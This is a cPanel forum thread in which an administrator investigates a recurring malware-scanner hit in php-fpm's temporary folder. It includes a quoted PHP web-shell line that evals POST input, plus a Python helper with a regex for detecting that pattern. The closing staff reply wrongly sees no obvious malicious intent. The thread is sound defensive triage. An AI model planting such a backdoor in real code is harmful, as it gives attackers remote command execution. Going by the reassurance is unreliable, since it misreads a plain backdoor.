The Community Forums

Malware tmp folder

Discussion in 'Security' started by DjordjeB, Dec 21, 2017.

  1. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    I get this from maldet once a month. Anyone know what this is? If it is dangerous, how do I prevent it?
    I have the latest cPanel (no 3rd-party software) and the latest kernel, so the system is updated.

    FILE HIT LIST:
    {HEX}php.malware.fopo.538 : /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm => /usr/local/maldetect/quarantine/phpYRhpBm.706132374
     
  2. 24x7server

    24x7server Well-Known Member

    Joined:
    Apr 17, 2013
    Messages:
    1,888
    Likes Received:
    90
    Trophy Points:
    78
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Hi,

    Check which user has uploaded this file. The user's data may be infected, causing this to occur.

    # ls -l /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm
    OR
    check the maldet session logs to see when it was quarantined and what process created it.
     
  3. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,400
    Likes Received:
    1,953
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    Let us know if the previous post helps. Note that Maldet is a third-party application, so you may want to reach out to a system administrator for additional assistance if you don't receive additional user-feedback on this thread:

    System Administration Services | cPanel Forums

    Thank you.
     
  4. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    Hello, thank you for the answer. The session log shows only what is in the report; I checked it with "maldet -l".
    That folder doesn't exist because I have quarantine enabled, so the message is: No such file or directory.
    Any other suggestions?
     
  5. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,400
    Likes Received:
    1,953
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    Does the file exist in the /usr/local/maldetect/quarantine directory? If so, you could view the file to verify its contents and see if it's legitimate. Note, if it's detecting "/usr/lib/systemd/system/ea-php56-php-fpm.service", here's how the contents of that file should look:

    Code:
    # cat /usr/lib/systemd/system/ea-php56-php-fpm.service
    [Unit]
    Description=The PHP FastCGI Process Manager
    After=syslog.target network.target network-online.target
    
    [Service]
    Type=notify
    PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
    EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
    ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
    ExecReload=/bin/kill -USR2 $MAINPID
    PrivateTmp=true
    
    [Install]
    WantedBy=multi-user.target
    Thank you.
     
  6. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    Actually no, in quarantine there are no files/folders like that. I will check directly in quarantine next time (because it happens a couple of times a month) and update this thread.
     
  7. Gojko

    Gojko Well-Known Member

    Joined:
    Nov 24, 2014
    Messages:
    83
    Likes Received:
    7
    Trophy Points:
    8
    Location:
    Macedonia
    cPanel Access Level:
    Root Administrator
    Hello. The content of one of them is:
    Code:
    8D9AAC4D8E44392996B8CDF782<?php  @eval($_POST['xbcmd']); die();?>
    second:

    Code:
    # owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
    CPANELACCOUNT:CPANELACCOUNT:600:71:0e95b1762b4f353bec9209d75350:1523196703:1523196508:1523196508:/tmp/systemd-private-21c4a2923244dbbd6c0543722c8f4-ea-php56-php-fpm.service-SBugLp/tmp/phpZRL1RW
    maldet:
    Code:
    maldet(20913): {scan} scan completed on /home/CPANELACCOUNT: files 3076, malware hits 0, cleaned hits 0, time 44s

    Code:
    cat /usr/lib/systemd/system/ea-php56-php-fpm.service
    [Unit]
    Description=The PHP FastCGI Process Manager
    After=syslog.target network.target network-online.target securetmp.service
    
    [Service]
    Type=notify
    PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
    EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
    ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
    ExecReload=/bin/kill -USR2 $MAINPID
    PrivateTmp=true
    LimitNOFILE=infinity
    
    [Install]
    WantedBy=multi-user.target
     
    #7 Gojko, Apr 11, 2018
    Last edited by a moderator: Apr 11, 2018
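    Added example (not code from the thread, maldet or cPanel): a small Python triage helper for exactly the evidence quoted above. It parses the quarantine info line format maldet printed (owner:group:mode:size:md5:atime:mtime:ctime:path, with ':' assumed as the separator), maps the /tmp/systemd-private-*/tmp path back to the service that wrote it (PrivateTmp=true in the unit file above is why php-fpm's /tmp lives there; the directory naming is assumed from the two paths quoted), recognises PHP's phpXXXXXX upload temp names, and flags the eval-of-$_POST shape of the quoted one-liner. The sample info line and file content are the ones posted in this thread, with CPANELACCOUNT kept as the thread's placeholder.

```python
import re

# Field order of the maldet quarantine info line quoted in the thread
# (owner:group:mode:size(b):md5:atime:mtime:ctime:file(path)); ':' is assumed as separator.
QUARANTINE_FIELDS = ("owner", "group", "mode", "size", "md5", "atime", "mtime", "ctime", "path")

# php-fpm runs with PrivateTmp=true (see the unit file in the thread), so files it writes to
# /tmp land in /tmp/systemd-private-<id>-<unit>-<random>/tmp/. Naming assumed from the two
# quoted paths, so <id> is hex and <random> is six alphanumerics.
PRIVATE_TMP_RE = re.compile(
    r"^/tmp/systemd-private-[0-9a-f]+-(?P<unit>[^/]+?)-[A-Za-z0-9]{6}/tmp/(?P<name>[^/]+)$")
# PHP names upload temp files phpXXXXXX; one that holds PHP code is worth a look.
PHP_UPLOAD_TMP_RE = re.compile(r"^php[A-Za-z0-9]{6}$")
# eval() fed from a request superglobal: the backdoor shape of the quarantined one-liner.
EVAL_REQUEST_RE = re.compile(r"@?eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE)


def parse_quarantine_line(line):
    """Split one quarantine info line into a dict keyed by QUARANTINE_FIELDS."""
    parts = line.strip().split(":", len(QUARANTINE_FIELDS) - 1)
    if len(parts) != len(QUARANTINE_FIELDS):
        raise ValueError("unexpected quarantine info line: %r" % line)
    return dict(zip(QUARANTINE_FIELDS, parts))


def triage(entry, content):
    """Answer the thread's questions: which service wrote the file, does its name look like a
    PHP upload temp file, does it eval request data, and which account owns it."""
    m = PRIVATE_TMP_RE.match(entry["path"])
    return {
        "unit": m.group("unit") if m else None,
        "php_upload_tmp": bool(m and PHP_UPLOAD_TMP_RE.match(m.group("name"))),
        "eval_of_request": bool(EVAL_REQUEST_RE.search(content)),
        "owner": entry["owner"],
        "mode": entry["mode"],
    }


# Constructed input: the info line and file content quoted in the thread (CPANELACCOUNT is the
# thread's own placeholder for the cPanel user name).
SAMPLE_INFO_LINE = ("CPANELACCOUNT:CPANELACCOUNT:600:71:0e95b1762b4f353bec9209d75350:1523196703:"
                    "1523196508:1523196508:/tmp/systemd-private-21c4a2923244dbbd6c0543722c8f4-"
                    "ea-php56-php-fpm.service-SBugLp/tmp/phpZRL1RW")
SAMPLE_CONTENT = "8D9AAC4D8E44392996B8CDF782<?php  @eval($_POST['xbcmd']); die();?>"

if __name__ == "__main__":
    verdict = triage(parse_quarantine_line(SAMPLE_INFO_LINE), SAMPLE_CONTENT)
    for key, value in verdict.items():
        print("%-16s %s" % (key, value))
```

    A unit of ea-php56-php-fpm.service plus an owner of a cPanel account points at that account's PHP upload handling, which is where the "which user uploaded this" check from the earlier reply starts.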
  8. cPanelMichael

    cPanelMichael Technical Support Community Manager
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    45,400
    Likes Received:
    1,953
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hello,

    The contents of the /usr/lib/systemd/system/ea-php56-php-fpm.service file that you provided match what I see on a test system. However, I believe you are referring to the contents of the PHP file in the /tmp directory. I don't see any obvious signs of malicious intent based on the information you provided, but you may want to reach out to a system administrator for additional assistance if you want a more in-depth investigation:

    System Administration Services | cPanel Forums

    Thank you.
     